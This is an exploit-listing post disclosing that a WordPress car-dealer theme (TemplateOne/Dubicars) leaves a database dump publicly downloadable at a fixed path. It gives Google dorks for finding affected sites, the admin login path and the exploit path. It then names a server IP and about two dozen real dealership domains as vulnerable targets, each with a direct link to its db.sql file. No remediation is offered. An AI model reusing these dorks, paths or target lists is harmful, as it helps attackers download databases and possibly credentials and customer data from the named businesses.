facebook facebook twitter rss

WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability

Author: KingSkrupellos , Published: 23-11-2018
#################################################################################################

# Exploit Title : WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : All Current Versions
# Google Dorks :
inurl:''/wp-content/themes/templateone/''
intext:''© Copyright 2015 | Powered by Dubicars''
intext:''© Copyright 2017 | Powered by Dubicars''
intext:''© Copyright 2018 | Powered by Dubicars''
intext:''Powered by Dubicars''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/themes/templateone/db.sql

#################################################################################################

# Example Vulnerable Sites =>

Vulnerable IP Address => (108.179.230.34)

There are 236 domains hosted on this server.

[+] simurghcars.ae/wp-content/themes/templateone/db.sql

[+] romeocars.ae/wp-content/themes/templateone/db.sql

[+] katrjimotors.com/wp-content/themes/templateone/db.sql

[+] algharymotors.ae/wp-content/themes/templateone/db.sql

[+] alaramcars.com/wp-content/themes/templateone/db.sql

[+] alsalamamotors.com/wp-content/themes/templateone/db.sql

[+] diamondclassmotors.com/wp-content/themes/templateone/db.sql

[+] tantoauto.com/wp-content/themes/templateone/db.sql

[+] storyauto-middleeast.com/wp-content/themes/templateone/db.sql

[+] tantoauto.com/wp-content/themes/templateone/db.sql

[+] whitemotors.org/wp-content/themes/templateone/db.sql

[+] 555motors.ae/wp-content/themes/templateone/db.sql

[+] tahanmotors.com/wp-content/themes/templateone/db.sql

[+] binhumaidan.com/wp-content/themes/templateone/db.sql

[+] formulaautofze.com/wp-content/themes/templateone/db.sql

[+] alnayrabusedcarstrading.com/wp-content/themes/templateone/db.sql

[+] exoticusedcarstr.com/wp-content/themes/templateone/db.sql

[+] dairausedcars.com/wp-content/themes/templateone/db.sql

[+] usmotorsuae.com/wp-content/themes/templateone/db.sql

[+] saleemmotors.com/wp-content/themes/templateone/db.sql

[+] moradmotors.com/wp-content/themes/templateone/db.sql

[+] najemmotors.com/wp-content/themes/templateone/db.sql

[+] jwmotors.net/wp-content/themes/templateone/db.sql

[+] ibitisammotors.com/wp-content/themes/templateone/db.sql

[+] classmotorsuae.com/wp-content/themes/templateone/db.sql

[+] alshibamotors.com/wp-content/themes/templateone/db.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :